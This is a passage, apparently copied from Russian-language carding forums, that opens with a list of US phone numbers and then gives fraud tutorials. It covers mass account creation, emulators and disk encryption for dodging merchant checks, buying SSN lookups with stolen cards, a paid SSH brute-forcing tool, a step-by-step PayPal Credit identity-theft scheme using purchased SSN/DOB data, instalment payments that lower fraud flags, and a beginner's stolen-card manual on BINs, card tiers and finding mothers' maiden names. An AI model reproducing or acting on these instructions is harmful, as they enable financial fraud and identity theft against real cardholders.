Omaha, NE 402-218-0010
Omaha, NE 402-342-4744
Omaha, NE 402-403-4265
Omaha, NE 402-572-5400
Omaha, NE 402-884-9550
Omaha, NE 402-970-0052
Beatty, NV 775-490-4065
Carson City, NV 775-881-3066
Carson City/ Gardnerville, NV 775-782-4558
Gardnerville, NV 775-782-5526
Henderson, NV 702-289-4265
Indian Springs, NV 702-447-4065
Jacks Valley, NV 775-267-5184
Las Vegas, NV 702-457-0674
Las Vegas, NV 702-457-4570
Las Vegas, NV 702-505-4265
Las Vegas, NV 702-862-4000
Las Vegas, NV 702-862-4738
Las Vegas, NV 702-862-8981
Las Vegas, NV 702-932-2500
Las Vegas, NV 702-932-2755
Las Vegas, NV 702-932-7001
Las Vegas, NV 702-932-7013
Lathrop Wells, NV 775-540-4065
Pahrump, NV 775-582-4065
Reno, NV 775-332-5906
Reno, NV 775-348-0100
Reno, NV 775-824-4943
Sandy Valley, NV 702-552-4065
Winnemucca, NV 775-621-4065
Yerington, NV 775-463-1595
Alstead, NH 603-574-4265
Barrington, NH 603-280-4265
Berlin, NH 603-326-4265
Canaan, NH 603-780-4265
Claremont, NH 603-287-4265
Claremont, NH 603-690-8001
Colebrook, NH 603-331-4265
Colebrook, NH 603-613-8001
Concord, NH 603-369-4265
Concord, NH 603-573-6010
Danbury, NH 603-992-4265
Deerfield, NH 603-460-8001
Derry, NH 603-552-5252
Derry, NH 603-552-7003
Dover, NH 603-285-6010
Dover, NH 603-740-2001
Exeter, NH 603-395-6000
Exeter, NH 603-583-4265
Hampton, NH 603-967-4265
Jefferson, NH 603-390-9013
Keene, NH 603-338-1001
Keene, NH 603-499-4265
Laconia, NH 603-273-8001
Laconia, NH 603-556-4265
Lancaster, NH 603-503-2021
Lancaster, NH 603-684-4265
Lebanon, NH 603-667-8001
Lebanon, NH 603-678-4265
Littleton, NH 603-259-4265
Littleton, NH 603-575-8001
Lyme, NH 603-597-8001
Manchester, NH 603-361-0010
Manchester, NH 603-782-4265
Milan, NH 603-317-2023
Milan, NH 603-951-4265
Milford, NH 603-769-4265
Milton, NH 603-350-8115
Monroe, NH 603-874-4265
Nashua, NH 603-577-3500
Nashua, NH 603-594-6700
Nashua, NH 603-689-6010
New Boston, NH 603-325-6001
North Conway, NH 603-730-2021
North Woodstock, NH 603-728-4265
North Woodstock, NH 603-739-8001
Penacook, NH 603-565-4265
Peterborough, NH 603-567-4265
Peterborough, NH 603-924-1400
Pike, NH 603-618-4265
Pike, NH 603-712-2046
Plaistow, NH 603-797-1001
Plaistow, NH 603-819-4265
Plymouth, NH 603-346-4265
Plymouth, NH 603-779-8001
Portsmouth, NH 603-294-4265
Portsmouth, NH 603-422-6200
Portsmouth, NH 603-570-6010
Rochester, NH 603-923-4265
Salem, NH 603-952-4265
Sanbornville, NH 603-871-4265
South Hampton, NH 603-274-8001
Spofford, NH 603-592-2021
Sunapee, NH 603-829-1001
Sunapee, NH 603-873-4265
Tamworth, NH 603-725-4265
Tamworth, NH 603-861-1001
West Chesterfield, NH 603-614-4265
Wolfeboro, NH 603-941-2021
Allentown, NJ 609-357-4265
Atlantic City, NJ 609-289-0010
Atlantic City, NJ 609-347-2366
Atlantic City, NJ 609-347-2820
Barnegat, NJ 609-607-1610
Barnegat, NJ 609-607-7521
Bayonne, NJ 201-515


Регистрация gmail без смс подтверждения

Тут вроде темы не нашел, поэтому пусть в одном месте будет, чтоб не искать где либо еще.
Столкнулся с тем, что обычным способом не зарегать без подтвержения по номеру телефона акк на гугле.
Но все оказалось проще простого)
1. Если у вас есть андроид устройство, то в настройках учетных записей создаем ааки гугла без какого либо подтвеждения по смс.
2. Если нет андроид устройства, то устанавливаем VirtualBox здесь, Далее скачивается образ андроида например этот для виртуальной машины VirtualBox. Скачиваем, инсталлируем, затем запускаем VirtualBox, импортируем скачанный образ (меню Файл->Импорт конфигураций), запускаем настройки и в свойствах сетевого адаптера выбираем «Тип подключения: NAT»
Запускаем импортированный образ и как только он запустится — сразу же появится мастер настройки Андроида с вопросом «есть ли у вас уже аккаунт в Google». Надо ответить — нет и создать новый аккаунт, а потом еще, еще и еще сколько надо)


Gmail - множество почтовых ящиков за 1 минуту

Расскажу об очень простом способе получить множество почтовых аккаунтов за 1 мин.
У Gmail есть одна фича, если в любом месте адреса gmail до знака «@» вставить любое количество точек, то такой адрес будет считаться действительным и вся почта будет приходить на ваш первоначальный адрес (без точек).
Допустим, у вас есть почтовый аккаунт [email protected]. Так вот аккаунты [email protected] или t.e.st@gmail будут все также работать и принимать почту на ваш ящик без точек. А самое приятное — это то, что практически все сайты в интернете будут расценивать такие почтовые ящики как абсолютно разные.
Таким образом, вам остается зарегистрировать почтовый аккаунт gmail с максимально длинным логином и с помощью простой программки либо скрипта проставить все вариации точек. На выходе вы получаете несколько тысяч валидных email адресов, которые можно использовать для регистраций, а вся почта (письма подтверждения, например) будут падать в один почтовый ящик.
Для вашего удобства выкладываю простенький софт, который расставляет точки в адресах gmail: https://yadi.sk/d/Hd-7eyk-dD4fr
Материал найден на просторах инета, тестировал лично-работает. Программка расставляет точки и сохраняет результат в тхт. Для примера, я вписал в неё почту с названием в 10 букв. Она выдала мне 511 вариантов.


Вы ещё пользуетесь виртуалкой? Тогда мы идем к Вам!
Всем привет! Сегодня я дам Вам возможность забыть о виртуальной машине раз и на всегда.
Не так давно мы рассматривали с Вами альтернативу TrueCrypt (Tips & Tricks от PNH)
Но как оказалось, есть еще одно очень интересное решение в области шифрования под названием VeraCrypt.
Это молодой проект, который был запущен в 2013 году и поддерживается по сей день. Созданный на базе TrueCrypt, переработанный и доведенный до ума.

И так, что такого в этой программе? У неё все те же функции что и у TrueCrypt. Но самая вкусная плюшка заключается в следующем - возможность зашифровать жесткий диск или раздел на котором находится операционная система windows.

Доступ к операционной системе после такого способа шифрования осуществляется только через ввод установленного Вами пароля.
Причем вводить пароль необходимо до загрузки windows (программа записывается в загрузочный сектор жесткого диска)
Жесткий диск зашифрован, а следовательно вся инфа на нем. Нет пароля - нет доступа.
Вы уже поняли к чему я клоню?) Да! Можно ставить английскую версию windows сразу на компьютер без всяких виртуальных машин.

В чем плюсы:
- высокая производительность системы
- установка любых приложений (у меня лично на виртуалке некоторые программы отказывались устанавливаться\запускаться)
- комфорт (ни каких тебе контейнеров с двойным дном и т.п., не надо закидывать виртуалку на флешку и шифровать её)
В чем минусы:
- Вы палите железов своего компа (hardware id). Если Вы параноик 85 лвл, то эта статья не для Вас.

И так, погнали!
Скачиваем программу с офф. сайта https://veracrypt.codeplex.com (полность бесплатна)
Устанавливаем, запускаем.
- Жмём на Создать том
- Выбираем третий вариант Зашифровать раздел или весь диск с системой
-Тип шифрования системы. Я выбрал обычный.
- Область шифрования. Я выбрал Зашифровать весь диск (выберайте вариант который Вам по душе)
- Шифрование защищенной области. Я выбрал Нет т.к. на ноуте нет скрытых разделов от
производителя.
- Число операционных систем. Я выбрал Одиночная загрузка
(можно создать два или три раздела на жестком диске и поставить три разные локализации windows
rus\eng\de. Или оставить на первом разделе систему для повседневных задач, а на второй систему
для наших пакостей)
- Настройки шифрования. Я все оставил по умолчанию. Нажмите кнопку Тест, после чего можете
выбрать оптимальный по скорости вариант шифрования.
- Устанавливаем пароль
После чего у Вас скореё всего появится ещё окошко. Делаем пароль длиннеё (по желанию) и идем дальше
- В этом окне надо водить курсором мыши как можно дольше. Как я понял, чем дольше водишь, тем
надежней ключ шифрования.
Можно привязать мышку к хомяку и пущай пару суток бегает в коробке.
- Тут просто жмем Далее
- Диск восстановления. Указываем папку куда будем сохранять образ. Вставляем пустой диск и записываем (этот шаг обязателен)
- После записи диска проверяем его на целостность и жмем Далее
- Режим очистки. Из четырех вариантов я выбрал Нет (самый быстрый)
- Проходим тест перед шифрованием
- Далее будет перезагрузка. Программа предупредит что программа будет на английском языке
- После перезагрузки увидим запрос на ввод пароля
Вводим пароль и ждем. Я ждал не меньше 20 секунд это точно, только после этого пошла загрузка
системы.
- Последний шаг, жмем Encrypt
- Всё прошло удачно. Всё, Вы сделали это.

Если необходимо убрать шифрование а так же вернуть стандартный загрузчик windows
- Запускаем программу. В самом верху списка с носителями информации будет наш зашифрованный.
Жмём левой кнопкой по нему -> Расшифровать перманентно -> расшифровываем
Программа полность на русском языке, почти в каждом шаге есть пояснения, читайте внимательно.
Я за безопасный вбив. Предохраняйтесь.
Описание способа пробива SSN, Background Checks,
Bankruptcy Records, Criminal Court Records и тд
Очень даже пригодилось!
Данная контора пробивает все что нужно для работы с банком или картами (SSN, Background Checks,
Bankruptcy Records, Civil Court Records, Criminal Court Records, Current Employment, Lookup, License Plate Lookup) ещё можно пробить людей и телефоны (People Searches, пробивает Phone Number Lookups, Real Property Lookup.)
Система везде одна и таже, по этому остановимся на SSN - все остальное сможете пробить в ней сами, по тому же принципу.
1. Заходим на http://www.docusearch.com/locc.html
2. Жмакаем "Order Now" Далее нас спросят сколько поисков нужно сделать, там уже каждый выбирает сколько конкретно нужно.
3. Нажимаем "chekout" и на следующей странице вбиваем детали на кого ищем SSN
4. После этого система просит залогинится, если новый пользователь (а мы таким им являемся) жмём регистрацию.

Надеюсь Далее все понятно в регистрации нет ничего сложного. После регистрации стандартный вбив, мерчант Authorize. Если карта зашла нормально - Далее уже система выдает пробитый SSN.
Не пользовался никогда услугами пробивал, услуга отлично себя зарекомендовала!
P.S. Пробивалы не унывайте ничто не вечно, контора тоже.


Брут SSH, своё всегда лучше

Продавец софта Вьетнамец, отлично говорит на английском гугл транслит и вперед.
Софт постоянно допиливается разработчиком.
Еще главный нюанс что бы оплатить ему пишем на почту. Но не пользоваться почтой руской маил ру яндекс.ру.
Lazy Ssh / Lazy Cheker
– PM: U4295949 (Terry)
– WMZ: Z249634456836
– Bitcoin: 1MqV2qZrtwyJQdjyxzeUJUeEW85o8mfHc3
– VCB: 0071000794363 – PHAM VAN THANH
– DAB: 0108991965 – PHAM VAN THANH
Contact
– Email: [email protected]
– Yahoo: thanhps42
- Skype: thanhps42
На офиц. сайте видео обучение как пользоваться каждым софтом.

Чекер
В бруте уже реализован диапазон IP по странам, желающим наиболего точного вхождения под штат,
город, необходима следующая софтинка: Ip_City
После полученного результата, подключаемся. Для этого идем на ачат http://forum.antichat.ru/thread329279.html и ставим софт.
Там проверяем тунели.
Для успешного поиска надо собирать свою базу паролей и ип_диапазонов.
Получается 2$ за брут, 2$ за чекер.=4$ В месяц
Обязательно. Для успешной работы софта должно быть установлено
Java (32 bit): https://www.java.com/en/download/manual.jsp/
Microsoft Visual C++ 2010: http://www.microsoft.com/en-us/download/details.aspx?id=5555


[FAQ] Скачки Великобритании

Привет всем, извиняюсь за долгое отсутствие, оффлайн не отпускал.
Как и обещал выкладываю свой опыт игры на бирже BetFair. Как и говорил ранеё, тема куплена на
ДМ и она идентична доработкам myfrum.
И еще такой момент, эта тема не гарантирует Вам 100% выигрыша. Как и везде, есть риски. Но в принципе они не такие большие.
А почему не большие? Ну потому что, мы выбираем лошадь, которая по статистике ЧУТЬ ли не самая
ПЛОХАЯ и вот только представьте. Выбрали мы лошадь, поставили ставку, что она НЕ придёт ПЕРВАЯ.
А она раз - и приходит первая. Это ж как должно фартануть?
Ну вот собственно и всё. Это и есть основная мысль схемы которой продают, ну и мне например, пару часов в скайпе показали, как всё таки выбрать лошадь для ставки. Но и это тоже весьма просто.
1. Для начала создайте аккаунт на BetFair.com.
2. Далее скачайте FairBot, ПО через которое вы будете играть - http://www.binteko.com/. Как мне сказали, она не запрещена и у неё триальное время 15 дней. Далее надо будет купить подписку на 1 год за 99$.
3. Запускайте FairBot и выбирайте "Horse Racing - Todays Card"
4. По умолчанию бот маркирует только 3 первых лидера, поскольку в основном мы ставим на 4 либо 5 фаворита в забеге, то нам надо зайти в Tools->Options->Appearance->Display Favourite Positions и поставить цифру 5. Можете даже 6 если хотите.
Теперь смотрим, какой нам подойдет забег. Выбираем забег исходя из таких фактов:
ˆ Название забега - без каких либо сокращений в скобочках. Например Newc - нам подходит. Newc (Place) - не ставим.
ˆ Дистанция - больше 2 миль (2m).
ˆ Количество лошадей минимум ВОСЕМЬ, чем больше тем лучше.
ˆ В забеге присутствует как минимум ОДИН ярко выраженный ЛИДЕР. Его мы увидим по низким коэффициентам.
Как только мы находим забег, который подходит нам по таким условиям. Начинаем анализ.
Давайте я приведу пример на забеге на котором - НЕ стоит ставить, т.к. все мои проигрыши как раз и были на забегах менеё 2 миль, в данном случае 6f.
Количество «беговых лошадей» (с коэфф. на против (lay) меньше 28) в данном забеге 6. То есть нас
этот забег устраивает.
Далее - идём на этот сайт http://www.attheraces.com/racecards/?ref=main nav&nav=racecards&sub=today'sracecards
Находим свой забег по названию, дистанции и времени. Нажимаем на вкладку 1 – откроется так называемый «предсказатель», то есть основанное на статистических данных графическое представление о том, какая лошадь, по мнению данного портала, имеёт бОльшие шансы на победу, а какая меньшие. Нас, интересуют последние 2-3 лошади, в идеале последняя. Сравниваем поочередно название лошади и её коэффициент. У последней лошади коэфф. 44, у предпоследней 15.5 – она то нам и подойдет.
Далее смотрим Form (места, которые занимала лошадь - в других забегах) – здесь даже при наличии 1 (единицы) в форм, данная лошадь нас будет устраивать, если эта 1 (единица) была 3-4 забега назад.
Здесь же мы видим идеальный для нас показатель form - ни 1, ни 2 нет и в помине. Коэффициент по рейтингу может быть любым! Болеё 20 брать смысла особого нет, прибыль маленькая. Не советую брать против первой лошади сверху в fairbotе – по той же негласной статистике они частенько приходят первыми.
Идём на этот сайт http://www.racingpost.com/horses2/cards/home.sd
Находим свой забег. В нём находим выбранную нами лошадь. Во вкладке At-a-Glance своеобразный предсказатель – менеё точный, но содержит в себе интересную информацию. Также если видим нашу лошадь в этом предсказателе в топе – не берем её. Если же она на 2-ом месте или ниже – продолжаем анализ.
Нажимаем на нашу лошадь, перед нами откроется окно с подробной статистикой выступлений в предыдущих забегов нашей лошади. Нас будет интересовать, сколько раз она приходила первой в предыдущих забегах этого года, и сколько раз на том покрытии, на котором она будет выступать сейчас. В нашем случае имеётся информация, что забег Hcap - HandicapRaces– скачки с нефиксированным весом лошадей. В этих скачках весовая нагрузка каждой конкретной лошади зависит от состава участников забега. Вес для каждого участника рассчитывается организаторами гонки с учетом прошлых выступлений лошади, её рейтинга. Смысл гандикапа заключается в уравнивании шансов участников. Лошадь с наивысшим рейтингом (фаворит) получает максимально возможный вес, предусмотренный правилами соревнования, лошадь с наименьшим рейтингом понесёт минимально положенный вес.
Для справки какие бывают обозначения и что они означают:

Обозначения различных забегов:
Nov – Novices Race
Mdn – Malden Race
Sell – Selling Race
Hcap – Handicap Race
Cond – Conditions Race
Claim – Claiming Race
Grp – Group Race
Stcs – Stakes Race
NH – National Hunt Racing
Hrd – Hurdle, тип барьерных скачек
Chs – Chase, тип барьерных скачек

Ищем соответствующий тип, для нас желательна лошадь, которая ни разу не прибегала первой в конкретном виде забега, на конкретном покрытии.
Как видим наша лошадь участвовала всего в трех забегах и ни разу даже не была в призерах. И по этому параметру данная лошадь нам подходит. Что ж, остаётся досмотреть забег и получить желаемый результат.
Вообщем, это я описал на одном примере. Вначале советую не играть забеги меньше 2 миль.
Если избегать коротких забегов (менеё 2 миль), брать только стоковые лошади (желательно последнюю), и не брать фаворита в fairbot, то профит обеспечен.
Если что не понятно - задавайте вопросы, отвечу как смогу - ведь у меня у самого обучение. Удачи.


Вбив с виртуальных андройд девайсов

Хочу вам предложить альтернативу виртуалке с виндой.
Мы будем использовать эмулятор Android девайсов, что позволит нам обмануть особо злостные
мерчи, которые идентифицируют и распознают ваш браузер даже если вы чистили куки.
http://www.genymotion.com
Создаем бесплатный аккаунт.
Качаем приложение себе на комп и устанавливаем.
У тех у кого уже установлена VirtualBox, можно скачать болеё легкую версию, ибо стандартный инсталлятор уже включает в себя VirtualBox.
Запускаем приложение, авторизуемся, нам предлагают создать виртуальный девайс, если нет, то нажимаем кнопку Add.
На этом этапе предлагаю выбрать девайс с болеё высоким разрешением для болеё удобной работы, например Nexus 7 с версией андроид постарше.
Вы можете пользоваться стандартным браузером, а можете скачать Firefox или Chrome для андроида.
Вот на этом сайте -> http://apps.evozi.com/apk-downloader/ вы можете выкачивать из google play бесплатные приложения в виде apk файла и устанавливать на девайс.
Когда вы успешно вбили. Удаляете девайс из списка и создаете новый.
У вас чистая система всего за пару минут.


Личный опыт работы с PayPal, или 3000$ за неделю

Хочу в данной теме поделиться личным опытом, как я работал с палкой летом этого года.
Тот, кто постоянно отслеживает темы про палку, возможно ничего нового для себя не откроет, но думаю, все смогут хоть что-то, но взять на заметку.
Кто с палкой сталкивается первый раз, рекомендую ознакомиться с темами о создании саморегов, т.к. я описываю всё по памяти и уделять внимание буду только важным ньюансам.
Смею сделать вывод, что палка железо не отслеживает, т.к. я всё время работал с одной виртуальной машины.
Итак, по порядку, всё на своем примере.

Исходные данные:
- Англоязычная облегченная Windows 7, стоит на виртуальной машине, без каких-либо намеков на присутствие русского языка (ни шрифтов, ни раскладок клавиатуры).
- В свойствах сетевого подключения (на ВМ), (Properties-TCP/IPv4) выбран пункт "использовать заданный DNS адрес" и в качестве него указан 8.8.8.8 (это чтобы не палился свой DNS)
- Установленный браузер Мозилла, с домашней страницей whoer.net
- Установленный ССleaner
- Портативная версия Iron (IronPortable). С данным браузером у меня лежит папка на рабочем столе.
- Proxifier и клиент сервиса с носками VIP72socks
- Также нам для работы потребуется SSN/DOB. Как раз на соседнем борде имелась тема о продаже ССН/ДОБ, я прикупил несколько штук, и как оказалось, качественных.
- Контакты человека, который может принять звонок от палки.

Описание процесса:
У нас имеётся на руках SSN/DOB, а так же адрес определенного человека. Рекомендуется использовать данные на людей возрастом 40-60 лет. Вероятность выдачи кредита на них больше, чем на сильно молодых или сильно старых.

Перед тем как начать работать с новым аккаунтом ПП (или переключиться на другой акк палки), всегда используем CCleaner и чистим им систему.

1. Для удобства я создаю на рабочем столе папку под каждый акк палки. В данном случае папку назовем PP1 или именем человека, на кого будем регистрировать акк.
В эту папку я копирую портативную версию Iron'a, которая будет использоваться только для одного акка палки. Далее создаю текстовый файлик в папке PP1 и копирую туда всю инфу о человеке (ССН/
ДОБ/АДРЕС), а так же по ходу работы указываю в нем всю необходимую информацию (ай пи, с которого выходил, зареганая почта и т.п.) Т.е. под каждую палку у нас будет своя копия браузера с куками и т.п. (и CCleaner её не трогает при очистке системы).

2. Идем на гугл мапс, вбиваем в поиск адрес имеющегося чела. Необходимо для того, чтобы убедится, правильно ли по нашей инфе данный адрес написан, т.к. при регистрации палки ошибки в адресе делать недопустимо.

3. Когда убедились, что адрес правильный (гугл мапс пока не закрываем) - необходимо подобрать носок под данный адрес. Открываем клиент Вип72, справа выбираем страну, штат, город под нашего
чела, нажимаем Get Ppoxy by GEO и видим список доступных носков для данного города. Я старался выбирать, у которых аптайм часов 20 хотя бы. Если нужного города в списке нет, то идем на гугл мапс и смотрим ближайший.
В идеале, выбранный носок надо чекнуть на ПроксиСкор или на привязку к палке, но я этого не делал.
Всё, выбрали носок - запускаем Proxifier. В нем должны быть указаны настройки для Вип72, чтобы он весь трафик перенаправлял через выбранный носок.

4. Запускаем Мозиллу и смотрим, чтобы наш айпишник не был нигде в черных листах, так же обращаем внимание на zip (если он совпадает с zip нашего чела, то это идеально). И очень важный момент - это часовой пояс и время. Оно должно совпадать с вашем временем на виртуальной машине. Если не совпадает, то путем изменения часового пояса подбираем необходимое и обновляем страницу whoer.net для сверки.
Если у нас всё ровно и нет никаких красных надписей, то идем дальше.

5. Запускаем Iron из нашей папки.
Переходим на aol.com и регистрируем почту, адрес должен быть похож на имя нашего чела (говорят, что сейчас при регистрации он начал запрашивать подтверждение по телефону. Выход - зарегиться из- под русского ай пи.)
Переходим на PayPal, выбираем создать новый аккаунт.
Заполняем все поля при регистрации РУКАМИ, без копипаста! Телефон указываем из инфы ССН/ДОБ, т.е. настоящий.
Далее палка предложит оформить кредит, для чего нам необходимо будет указать ССН и день рождения. Вся эта инфа у нас есть, тоже все вводим руками и делаем вид, что просматриваем условия кредита. Ведем себя, как обычный пользователь. Ставим галочки, где необходимо, и жмем "Я
согласен".
При хорошем стечении обстоятельств, а именно - чистый носок, хорошая кредитная история и т.п. вам одобрят кредит. Суммы бывают разные. У меня было от 500 до 1500$.

6. Если кредит одобрили, то идем на ебей, и регаем там аккаунт на этого же человека с его же адресом и почтой, которую мы недавно зарегали.
Бродим по ебею минут 5-10, смотрим товары (ведем себя как обычный покупатель). Присматриваем что-нибудь баксов за 20-50 (что-нибудь для кухни, дома (не ликвидное)) отправляем в корзину и
пытаемся купить с помощью палки, на адрес нашего чела (перед этим убеждаемся, что наш прозвонщик на связи) - вводим логин/пароль палки, выбираем способ оплаты ПП Кредит.
Здесь возможно несколько исходов:
1. Будет отказано и предложено выбрать другой способ оплаты. Пробуем еще раз через неделю или забиваем на эту палку.
2. Попросит подтвердить номер телефона при помощи приема автоматического звонка от ПП (чаще всего).
3. И если вы везунчик, то оплата пройдет сразу.

7. Если палка предложила принять звонок, то считай, вероятность, что её поимеёшь - 80%. Здесь главное не накосячить. Как известно, у нас указан настоящий номер телефона холдера, т.е. он нам не
подходит. Порядок действий следующий:
Нас перекидывает на страницу, с просьбой подтвердить № телефона. Ничего не трогаем.
Просим приемщика звонков нам дать номер под палку и нужный штат.
Открываем по соседству страницу с акком палки, заходим в настройки, меняем номер телефона на тот, который дал приемщик звонков (тип номера - Home).
Возвращаемся на страницу с подтверждением номера, нажимаем в браузере назад. Далее опять "купить", снова вылазит страница с подтверждением номера. Выбираем номер, который дал прозвонщик. Если все хорошо, то палка выдаст 4 цифры - их надо передать прозвонщику, что бы он их ввел при входящем звонке. Если все прокатывает, то оплачиваем услуги прозвонщику.
Всё! Покупка на адрес холдера совершилась, и это очень хорошо.
Возвращаемся на ебей и еще совершаем пару мелких покупок на адрес холдера - подтверждений уже никаких не надо.

8. После данных манипуляций, даем отдохнуть палке до следующего дня.
На следующий день, заходим с того же носка на ебей, ходим-смотрим товар, присматриваем уже себе, кладем в корзину. По сумме - ориентируемся процентов на 80-90% от остатков кредита.
Заходим в настройки, добавляем 2ой адрес для доставки (уже адрес посредника в ЮСЕ).
И покупаем на адрес посредника. ПРОФИТ!!
За неделю работы по данной схеме я зарегал 8 саморегов, из них 5 - одобрили кредит, и из 3 я смог выкачать по полной (ноут, часы, 2 телефона + нал 500$)
Причем, слив бабло на одном из них, я привязал банк акк, закрыл образовавшийся долг и слил его снова.
Так же с одного из них, я сделал прямой перевод 500$ на свою личную палку, ради эксперимента. Так мне даже ни сообщения не пришло, о незаконном переводе, и тем болеё её не залимитили.
Плюс работы с палкой в том, что можно спокойно покупать ликвидный товар и слать его на посредника, не боясь о том, что его развернут. Владелец узнает о каких-либо манипуляциях минимум через месяц, когда на его почтовый адрес придет выписка.
Данная статья предназначена больше не для обучения, а для того чтобы обратить внимание на нюансы и поделиться опытом.


PayMyWay (товар в рассрочку)

Путешествуя по различным шопам, много раз подмечал интересную графу в способе оплате товара как PayMyWay и решил об этом почитать поглубже и написать нашим форумчанам. Такой вид платежа достаточно распространен в американских шопах, что в принципе неудивительно, глядя на их количество кредитов на душу населения в стране.
Прежде всего, главный плюс данного платежа ,как вы поняли в названии, в том, что не нужно отдавать целиком всю сумму сразу за наш ордер, а его можно разбить на ежемесячные платежи с первоначальным взносом. Сумма товара дробится обычно на 3, 6 или 12 месяцев. Через каждые 30 дней на карту картхолдера вытавлется счет от шопа с этой месячной суммой, то есть товар будет в рассрочку. Тем самым мы причиняем не так много неудобств кх, обременяю его какими-то жалкими 100$ вместо 1000$.
Использовать данный вид платежа можно с суммой в среднем до 1000 баксов, в зависимости от крутости шопа.
Особенность данного метода, что подойдут только кредитки - дебетки, гифты и прочеё не годны.
В остальном он ничем болеё не отличается от обычного платежа, когда деньги моментально улетучиваются с кредитки.
Как вывод, главное преимущество PayMyWay - с карты будет списана лишь часть суммы, что вызовет меньше подозрения и меньше вероятности прозвона, фрода, что скореё пропустит ваш ордер.
Магазин не будет столь на чеку из-за некрупности платежа. Хоть он и потеряет кэш, но разбор полетов будет не большим по масштабам.
Так что советую пользоваться данной опцией, если где увидите.


Кардинг для начинающих и не только

Мануал, довольно-таки интересно и развернуто написан.У нас на форуме, не встречал. Всем приятного чтива.
Здравствуйте уважаемые читатели. Сидя на форумах, заметил что все больше и больше людей, пишут: “вещевой кардинг умирает”, болеё того, люди отдают за это достаточно неплохие деньги, но так ничему и не могут научиться. Что и побудило меня написать данный мануал, скажу откровенно, писатель из меня так себе, порой сложно собраться мыслями, чтобы изложить читателю, то что я имею ввиду. Эдакий Кличко, кардинга. Все действия описанные в мануале имели актуальность по 2014, и до сих пор имеют, все линки и сервисы были работоспособны.
Ну, что же, начнем!

Глава 1 - Виртуальный Кардинг

Эта Глава посвящена виртуальному кардингу. Виртуальный кардинг, это покупка онлайн с использованием краденой информации о кредитных картах, также известных как “CVV”, “pizza”, “картошка”, под другим именем, и остаться при этом незамеченным. Звучит легко, но на пути очень много препятствий, так как мерчанты, улучшают свою защиту все лучше и лучше. И с каждым днём приходится придумывать новые способы

1.1 - Как это работает
Первое что вы должны сделать, это спросить себя, сколько вы хотите скардить, и что вы хотите скардить? Затем вы должны определить к какому уровню из 3х завяленных ниже оно принадлежит.
Каждый уровень повышает уровень сложности, ниже приведены некоторые особенности:
1 уровень: легкий кардинг
Этот уровень очень легко скардить, к примеру рестораны, телефонные ордера,в большинстве случаев менеё 100$. Это отправная точка для большинства кардеров. Для этого вам будут нужны
ˆ CVV
ˆ Expiration Date (Дата действия)
2 уровень: средний уровень
Этот уровень используемый для онлайн транзакций немного труднеё, для него нужна доп информация, как background reports и т.д. Можно скардить небольшую электронику. Для него вам будут нужны
ˆ CVV
ˆ Exp date
ˆ CCV code
ˆ Cardholder name (имя владельца)
ˆ Полный адрес Кардхолдера (Далее billing addres)
ˆ Порой, телефонный номер и иная информация из background reports
3 уровень: тяжёлый уровень
Этот уровень не рекомендуется для начинающих кардеров. Тут мы будет говорить о больших предметах, дорогой электронике, и многие другие товары из этого уровня, сайтах типа Newegg, TigerDirect, и которые требуют пройти процедуру Account Take-Over (об ATO мы поговорим позднеё).
Для этого вам будут необходимы:
ˆ CVV
ˆ Exp Date
ˆ Cardholder Name
ˆ Billing addres
ˆ Телефонные номера
ˆ SSN (Social Security Number) вроде ИНН в России
ˆ DOB (Date of Birth) дата рождения кардхолдера
ˆ Background Report

Если вы нацелены на 1 уровень, вы можете позвонить в пиццерию, и заказать её на другой адрес, нет надобности описывать это на 2 страницы, это очень легко.
Если же ваша цель 2 уровень, вы можете скардить background report, мелкую электронику, в большинстве случаев менеё 300. Все покупки онлайн, и вам нужно будет ввести верный биллинг
адрес, адрес доставки и информацию о карте.
Давайте взглянем на сайт который вы хотите скардить, и почитаем их Privacy & Policy, Payment, Shipping rules, если там сказано, что сайт сверяет номер телефона с файлами в банке, мы должны будем внести наш телефон в файлы банка, либо сделать подмену номера (об этом мы говорим в главе 2.1), если же на сайте который мы хотим скардить, ничего такого не написано, мы можем сами позвонить в магазин и спросить. Позвонит ли нам магазин? Это зависит от ордера, их правил, и в вашей подозрительности, однозначного ответа дать нельзя. Запомните успешный кардинг состоит из проб и ошибок
Когда вы используете одну карту для вбива, не используйте её для другого сайта, ждите пока ваш товар отправят. Сделать успешный вбив очень легко, но добиться его отправки, это уже совсем другой вопрос.
2ым уровнем карт очень часто кардят peoplefinders.com. Тут большинство кардеров берут background report. Хорошеё место для тренировки ваших навыков.
Теперь поговорим об уровне 3. Вы наверное заметили сколько информации нужно для этих карт, где их взять? Первое пробейте его возраст, если кардхолдеру меньше 40, тут ваши шансы очень малы. В любом случае читаем дальше
Первое что вы должны сделать, это найти правильную карту. Иначе говоря хороший BIN (Bank Identification Number). BIN это первые 6 цифр карты, и используется для определения банка, и типа карты. Чтобы узнать бльше посетите сайт Bindb.com, Bins.pro. Итак у нас есть Debit и Credit карты, и типы этих карт меняются. Перечислю по возрастанию:
ˆ Secured: Очень маленькие суммы, обычно до 300
ˆ Classic: Маленькие суммы, иногда до 1000
ˆ Gold: Средние суммы, обычно до 3000
ˆ Platinum: Большие суммы, обычно до 8000
ˆ Business: Очень больше суммы, обычно до 15000 и больше
ˆ Signature: Самые лучшие карты, мне попадались карты которые имели 80000 кредитного лимита.
Запомните эти цифры могут быть неверны, все зависит от credit score, истории, и сумм которые использует кардхолдер. По своему опыту скажу,что debit карты, очень часто нехватает сумм, и у них болеё строгая защита для онлайн покупок. Говоря другими словами, их лучше не использовать для кардинга уровня 3, а использовать для 1-2 уровня.
Зарегистрируйте аккаунт на любом поисковике SSN, вроде ssnfinder.ru или ssndob.cc (базы поновеё).
Можно пробивать у других селлеров.
Теперь ищем нашего кардхолдера, пока идет поиск, идем на peoplefinders.com и достаем полную информацию цели, можете легко скардить его, используя карту 2 уровня. Когда вы все нашли, проверьте чтобы адрес и дата рождения совпадали. Если все совпадает, полагаем что SSN будет верен.
Используйте логику, чтобы убедиться что вы верно сопоставили информацию,и нашли того кто нам нужен.
Для информации: Около 80% старше 40 лет, могут быть найдены.
Нашли верный SSN и DOB? Круто! Теперь время найти девичью фамилию матери. Это немного сложно, и в основном работает на людях их следующих штатов: Arizona, California, Delaware, Idaho,
Indiana, Kentucky, Maine, Maryland, Massachusetts, Minnesota, Nevada, New Hampshire, New Jersey, Ohio, Rhode Island, South Dakota, Texas. Топайте на сайт Archives.com и скардите там подписку, в background report взятого с сайта peoplefinders.com, вы должны найти мать кардхолдера, проверьте имя и дату рождения. И сопоставьте её с данными с archives.com,там есть записи о замужестве, и её предыдущая фамилия. Это работает примерно в 50% случаях.
